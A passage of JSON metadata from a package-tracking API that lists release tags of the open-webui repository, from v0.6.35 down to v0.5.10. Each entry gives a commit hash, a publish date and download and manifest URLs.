Fopen-webui/tags/v0.6.35","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.35/manifests"},{"name":"v0.6.34","sha":"9ae06a3cac140673cb93895bab37846095e71059","kind":"commit","published_at":"2025-10-16T16:55:47.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.34","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.34","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.34","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.34","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.34/manifests"},{"name":"v0.6.33","sha":"8d7d79d54b9160425fc5050b3484bec40dd3b44e","kind":"commit","published_at":"2025-10-07T21:20:27.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.33","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.33/manifests"},{"name":"v0.6.32","sha":"37d1c85c996e1bdcd505e1e6d62b2f17acd8df23","kind":"commit","published_at":"2025-09-29T06:13:00.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.32","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.32/manifests"},{"name":"v0.6.31","sha":"598282cf75de358215d045c617e70d28bc48929e","kind":"commit","published_at":"2025-09-25T20:28:06.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.31","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.31/manifests"},{"name":"v0.6.30","sha":"8920bf23774edd829e54e65b043864afb97bf2cf","kind":"commit","published_at":"2025-09-17T17:25:26.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.30","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.30/manifests"},{"name":"v0.6.29","sha":"dddd1e44f37e0b489d10abbc21667e16d62722f6","kind":"commit","published_at":"2025-09-17T16:32:59.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.29","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.29/manifests"},{"name":"v0.6.28","sha":"171021cfa4276f63fd9fd7f31fa0c904fb13c24c","kind":"commit","published_at":"2025-09-10T10:53:30.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.28","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.28/manifests"},{"name":"v0.6.27","sha":"918f507d8cdc652ae913b8596877a8a50b845114","kind":"commit","published_at":"2025-09-09T14:34:15.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.27","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.27/manifests"},{"name":"v0.6.26","sha":"2407d9b905978d68619bdce4021e424046ec8df9","kind":"commit","published_at":"2025-08-28T10:40:19.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.26","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.26/manifests"},{"name":"v0.6.25","sha":"1db8dec4f52fc0fa8f8f7bfbb8ea5bde41fee17d","kind":"commit","published_at":"2025-08-22T13:22:31.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.25","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.25/manifests"},{"name":"v0.6.24","sha":"2777bab1485aad097aa41c44a76f49be141eb061","kind":"commit","published_at":"2025-08-22T10:06:05.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.24","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.24/manifests"},{"name":"v0.6.23","sha":"407dc9a401fc2382df06d776dbd8ba95dffda38a","kind":"commit","published_at":"2025-08-21T18:21:10.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.23","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.23/manifests"},{"name":"v0.6.22","sha":"438e5d966f0f64f9ea3feab22724a5bd96a4127b","kind":"commit","published_at":"2025-08-11T13:15:28.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.22","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.22/manifests"},{"name":"v0.6.21","sha":"30d0f8b1f6cc45ac3ee7e05ccb5c849366680231","kind":"commit","published_at":"2025-08-10T13:39:57.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.21","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.21/manifests"},{"name":"v0.6.20","sha":"3f35ba27fc31500e2b1085f067371541becd5165","kind":"commit","published_at":"2025-08-09T22:59:14.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.20","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.20/manifests"},{"name":"v0.6.19","sha":"2c3655a9694fc3f9a428e5521f42a187901d8dc0","kind":"commit","published_at":"2025-08-09T22:38:48.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.19","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.19/manifests"},{"name":"v0.6.18","sha":"5fbfe2bdcadf5f157926f6551891e4dc0802b9f3","kind":"commit","published_at":"2025-07-19T19:26:01.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.18","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.18/manifests"},{"name":"v0.6.17","sha":"b249809d2dff7bc89394a61ee5f7e258b295623a","kind":"commit","published_at":"2025-07-19T17:39:46.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.17","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.17/manifests"},{"name":"v0.6.16","sha":"f966935d1da56a1f9f8691c1f62d68eecc0438fa","kind":"commit","published_at":"2025-07-14T17:39:26.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.16","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.16/manifests"},{"name":"v0.6.15","sha":"b5f4c85bb196c16a775802907aedd87366f58b0f","kind":"commit","published_at":"2025-06-16T14:34:32.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.15","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.15/manifests"},{"name":"v0.6.14","sha":"63256136ef8322210c01c2bb322097d1ccfb8c6f","kind":"commit","published_at":"2025-06-10T14:17:50.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.14","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.14/manifests"},{"name":"v0.6.13","sha":"53764fe64884da147359e54ed6d9607fe57f1600","kind":"commit","published_at":"2025-05-29T21:37:21.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.13","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.13/manifests"},{"name":"v0.6.12","sha":"ba0088f39b7a093920b142a5172554686f24df60","kind":"commit","published_at":"2025-05-28T23:59:24.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.12","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.12/manifests"},{"name":"v0.6.11","sha":"9faa4c6a4cd8dd643cddb93dccb65c6609488a29","kind":"commit","published_at":"2025-05-26T22:27:09.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.11","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.11/manifests"},{"name":"v0.6.10","sha":"e6afa69f59295d2930ff57285d0933e207d8e4c3","kind":"commit","published_at":"2025-05-19T01:34:23.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.10","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.10/manifests"},{"name":"v0.6.9","sha":"0cef844168e97b70de2abee4c076cc30ffec6193","kind":"commit","published_at":"2025-05-10T19:04:48.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.9","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"ef301aa16b84f9cbc0ece18539f9db80bff0f605","kind":"commit","published_at":"2025-05-10T15:31:52.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.8","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"a3bb7df61058e690a76cebb7681bd5390e77d226","kind":"commit","published_at":"2025-05-06T23:08:25.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.7","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"23b9354cf6575bfe82e67df0660128d5a92461fc","kind":"commit","published_at":"2025-05-05T13:58:52.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.6","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"07d8460126a686de9a99e2662d06106e22c3f6b6","kind":"commit","published_at":"2025-04-14T09:13:21.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.5","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.5/manifests"},{"name":"v0.6.4","sha":"aca37f592d0dedea2529fcb4304e4ff39e0c1219","kind":"commit","published_at":"2025-04-13T06:01:19.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.4","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.4/manifests"},{"name":"v0.6.3","sha":"8b0e565e2c8a8f47f54ef039eb132ddb756e83a6","kind":"commit","published_at":"2025-04-13T05:44:24.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.3","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.3/manifests"},{"name":"v0.6.2","sha":"63533c9e3ab41edd7bd4124ef94f6b6dc09aa175","kind":"commit","published_at":"2025-04-07T03:41:10.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.2","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.2/manifests"},{"name":"v0.6.1","sha":"da948351658602fb7870b3e8573ad2b6f1ace09e","kind":"commit","published_at":"2025-04-05T17:15:32.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.1","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.1/manifests"},{"name":"v0.6.0","sha":"04799f1f95f958674d35ba4854ef62754a4d332e","kind":"commit","published_at":"2025-04-01T01:47:18.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.6.0","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.6.0/manifests"},{"name":"v0.5.20","sha":"3b70cd64d7fa6902e8c79cf8dcbf3c7e84cf704b","kind":"commit","published_at":"2025-03-06T03:44:45.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.20","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.20/manifests"},{"name":"v0.5.19","sha":"1a51584fe02ba917e229f52367363ff783babd22","kind":"commit","published_at":"2025-03-05T06:22:20.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.19","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.19/manifests"},{"name":"v0.5.18","sha":"95cadaca72e676199caf894f40cc132d7c8416df","kind":"commit","published_at":"2025-02-27T20:00:52.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.18","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.18/manifests"},{"name":"v0.5.17","sha":"15485e7c5d2c09857acce10e311707e2bb8e86c9","kind":"commit","published_at":"2025-02-27T11:46:08.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.17","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.17/manifests"},{"name":"v0.5.16","sha":"6fedd72e3973e1d13c9daf540350cd822826bf27","kind":"commit","published_at":"2025-02-20T19:26:36.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.16","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.16/manifests"},{"name":"v0.5.15","sha":"9fdf2cd16c38d1711616925e852f17cac865d5fe","kind":"commit","published_at":"2025-02-20T10:01:29.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.15","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.15/manifests"},{"name":"v0.5.14","sha":"3f3a5bb0ab8ce3425f317f1e57b084523aa2b2a5","kind":"commit","published_at":"2025-02-18T05:48:39.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.14","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.14/manifests"},{"name":"v0.5.13","sha":"e4c9734fcba5105c30de874fd4c21c602dbd08a6","kind":"commit","published_at":"2025-02-18T04:36:50.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.13","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.13/manifests"},{"name":"v0.5.12","sha":"2017856791b666fac5f1c2f80a3bc7916439438b","kind":"commit","published_at":"2025-02-14T07:12:46.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.12","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.12/manifests"},{"name":"v0.5.11","sha":"4d667e447d0ae09e7723b979a699d0e85806552b","kind":"commit","published_at":"2025-02-13T10:06:04.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.11","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags/v0.5.11/manifests"},{"name":"v0.5.10","sha":"e9d6ada25cd6ce84be067ba794af4c9d7116edc7","kind":"commit","published_at":"2025-02-05T22:46:41.000Z","download_url":"https://codeload.github.com/open-webui/open-webui/tar.gz/v0.5.10","html_url":"https://github.com/open-webui/open-webui/releases/tag/v0.5.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/open-webui/open-webui@v0.5.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/open-webui%2Fopen-webui/tags